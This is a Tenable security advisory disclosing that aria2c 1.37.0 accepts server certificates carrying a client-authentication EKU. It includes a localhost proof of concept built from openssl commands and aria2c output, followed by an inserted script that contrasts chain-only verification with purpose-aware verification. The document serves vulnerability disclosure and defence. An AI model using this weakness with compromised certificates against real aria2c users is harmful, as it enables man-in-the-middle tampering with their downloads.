Synopsis
Tenable Research discovered that aria2c accepts a server certificate with an incorrect Extended Key Usage (EKU). If attackers compromise a certificate (with the associated private key) issued for a different purpose, they may be able to reuse it for TLS server authentication.
Proof of Concept
In this PoC, we generate private keys and the corresponding X.509 certificates, configure a TLS server to use them, and then show how aria2c fails to properly validate a certificate not meant to be used for TLS server authentication. In a real attack, the attackers would reuse an X.509 certificate and its corresponding key that they managed to compromise.
Generate a set of RSA keys:
openssl genrsa -out ca-key.pem 2048
openssl genrsa -out server-key.pem 2048
Create an OpenSSL config:
cat openssl-ca.cfg
[ ca ]
keyUsage = critical,digitalSignature,keyCertSign,cRLSign
extendedKeyUsage = serverAuth,clientAuth
basicConstraints = critical,CA:TRUE
subjectKeyIdentifier = hash
authorityKeyIdentifier = keyid:always
[ server ]
keyUsage = critical,digitalSignature
extendedKeyUsage = serverAuth
basicConstraints = critical,CA:FALSE
subjectKeyIdentifier = hash
authorityKeyIdentifier = keyid:always
[ server-bad-eku ]
keyUsage = critical,digitalSignature
extendedKeyUsage = clientAuth
basicConstraints = critical,CA:FALSE
subjectKeyIdentifier = hash
authorityKeyIdentifier = keyid:always
Generate root CA certificate:
openssl req -x509 -new -key ca-key.pem -days 365 -out ca-cert.pem -subj "/CN=TestCA" -config openssl-ca.cfg -extensions ca
Generate a certificate signing request:
openssl req -new -key server-key.pem -out server.csr -subj "/CN=server" -addext "subjectAltName = DNS:localhost"
Generate a valid server certificate:
openssl x509 -req -CA ca-cert.pem -CAkey ca-key.pem -CAcreateserial -in server.csr -out server-cert.pem -days 365 -extfile openssl-ca.cfg -extensions server -copy_extensions copyall
Check the EKU in the generated certificate:
openssl x509 -text -noout -in server-cert.pem | grep -i 'Extended Key Usage' -A1
X509v3 Extended Key Usage:
TLS Web Server Authentication
Generate an invalid server certificate with an incorrect EKU:
openssl x509 -req -CA ca-cert.pem -CAkey ca-key.pem -CAcreateserial -in server.csr -out server-bad-eku-cert.pem -days 365 -extfile openssl-ca.cfg -extensions server-bad-eku -copy_extensions copyall
Check the EKU in the generated certificate:
openssl x509 -text -noout -in server-bad-eku-cert.pem | grep -i 'Extended Key Usage' -A1
X509v3 Extended Key Usage:
TLS Web Client Authentication
Start a server using a valid server certificate:
openssl s_server -key server-key.pem -cert server-cert.pem -www -port 8080
Connection succeeds as expected:
aria2c --ca-certificate=ca-cert.pem https://localhost:8080
04/30 18:14:37 [NOTICE] Downloading 1 item(s)
04/30 18:14:37 [NOTICE] Download complete: /home/parallels/aria2c/index.html
Download Results:
gid |stat|avg speed |path/URI
======+====+===========+=======================================================
9bf002|OK | 588KiB/s|/home/parallels/aria2c/index.html
Status Legend:
(OK):download completed.
Start a server using a server certificate with incorrect EKU:
openssl s_server -key server-key.pem -cert server-bad-eku-cert.pem -www -port 8080
The connection succeeds when it should not:
aria2c --ca-certificate=ca-cert.pem https://localhost:8080
04/30 18:14:57 [NOTICE] Downloading 1 item(s)
04/30 18:14:57 [NOTICE] File already exists. Renamed to /home/parallels/aria2c/index.1.html.
04/30 18:14:57 [NOTICE] Download complete: /home/parallels/aria2c/index.1.html
Download Results:
gid |stat|avg speed |path/URI
======+====+===========+=======================================================
c6e101|OK | 673KiB/s|/home/parallels/aria2c/index.1.html
Status Legend:
(OK):download completed.
The download also completes when --check-certificate is given explicitly:
aria2c --ca-certificate=ca-cert.pem --check-certificate https://localhost:8080
04/30 18:15:07 [NOTICE] Downloading 1 item(s)
04/30 18:15:07 [NOTICE] File already exists. Renamed to /home/parallels/aria2c/index.2.html.
04/30 18:15:07 [NOTICE] Download complete: /home/parallels/aria2c/index.2.html
Download Results:
gid |stat|avg speed |path/URI
======+====+===========+=======================================================
686fe6|OK | 786KiB/s|/home/parallels/aria2c/index.2.html
Status Legend:
(OK):download completed.
aria2c --ca-certificate=ca-cert.pem --check-certificate=true https://localhost:8080
04/30 18:15:14 [NOTICE] Downloading 1 item(s)
04/30 18:15:14 [NOTICE] File already exists. Renamed to /home/parallels/aria2c/index.3.html.
04/30 18:15:14 [NOTICE] Download complete: /home/parallels/aria2c/index.3.html
Download Results:
gid |stat|avg speed |path/URI
======+====+===========+=======================================================
4a4aec|OK | 786KiB/s|/home/parallels/aria2c/index.3.html
Status Legend:
(OK):download completed.
The aria2c version tested, on Ubuntu 24.04:
aria2c --version | head -n 1
aria2 version 1.37.0
Other versions may be vulnerable too, but we have not validated additional versions.
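The check the PoC shows to be missing can be reproduced with OpenSSL's purpose-aware verification. This is an added example, not part of the Tenable advisory or aria2's code: plain chain verification accepts the clientAuth certificate, while `openssl verify -purpose sslserver` rejects it. The function names, pki.cfg and the temporary directory are assumptions of this example, and all keys and certificates are constructed test material.

```shell
#!/bin/sh
# Added example: chain-only vs purpose-aware verification of the PoC's leaves.
# Keys and certificates are constructed, throwaway test material.

# chain_ok CA CERT: signature chain and validity only, no purpose check.
chain_ok() { openssl verify -CAfile "$1" "$2" >/dev/null 2>&1; }

# server_purpose_ok CA CERT: also require key usage/EKU valid for a TLS server.
server_purpose_ok() { openssl verify -purpose sslserver -CAfile "$1" "$2" >/dev/null 2>&1; }

# make_test_pki DIR: test CA plus a serverAuth and a clientAuth leaf; the leaf
# keyUsage/EKU values follow the advisory's [ server ] and [ server-bad-eku ].
make_test_pki() {
    cat > "$1/pki.cfg" <<'EOF'
[ req ]
distinguished_name = dn
[ dn ]
[ ca ]
basicConstraints = critical,CA:TRUE
keyUsage = critical,digitalSignature,keyCertSign,cRLSign
[ server ]
basicConstraints = critical,CA:FALSE
keyUsage = critical,digitalSignature
extendedKeyUsage = serverAuth
[ server-bad-eku ]
basicConstraints = critical,CA:FALSE
keyUsage = critical,digitalSignature
extendedKeyUsage = clientAuth
EOF
    openssl req -x509 -newkey rsa:2048 -nodes -keyout "$1/ca-key.pem" \
        -out "$1/ca-cert.pem" -days 1 -subj "/CN=TestCA" \
        -config "$1/pki.cfg" -extensions ca 2>/dev/null
    openssl req -new -newkey rsa:2048 -nodes -keyout "$1/server-key.pem" \
        -out "$1/server.csr" -subj "/CN=server" -config "$1/pki.cfg" 2>/dev/null
    for ext in server server-bad-eku; do
        openssl x509 -req -in "$1/server.csr" -CA "$1/ca-cert.pem" \
            -CAkey "$1/ca-key.pem" -CAcreateserial -days 1 \
            -extfile "$1/pki.cfg" -extensions "$ext" \
            -out "$1/$ext-cert.pem" 2>/dev/null
    done
}

dir=$(mktemp -d) && make_test_pki "$dir"
for leaf in server server-bad-eku; do
    chain_ok "$dir/ca-cert.pem" "$dir/$leaf-cert.pem" && c=ok || c=FAIL
    server_purpose_ok "$dir/ca-cert.pem" "$dir/$leaf-cert.pem" && p=ok || p=FAIL
    echo "$leaf: chain=$c sslserver=$p"
done
```

A TLS client that verifies the server certificate for the server-authentication purpose is expected to behave like the second function and refuse the server-bad-eku certificate.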
Solution
There is currently no fix available.
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]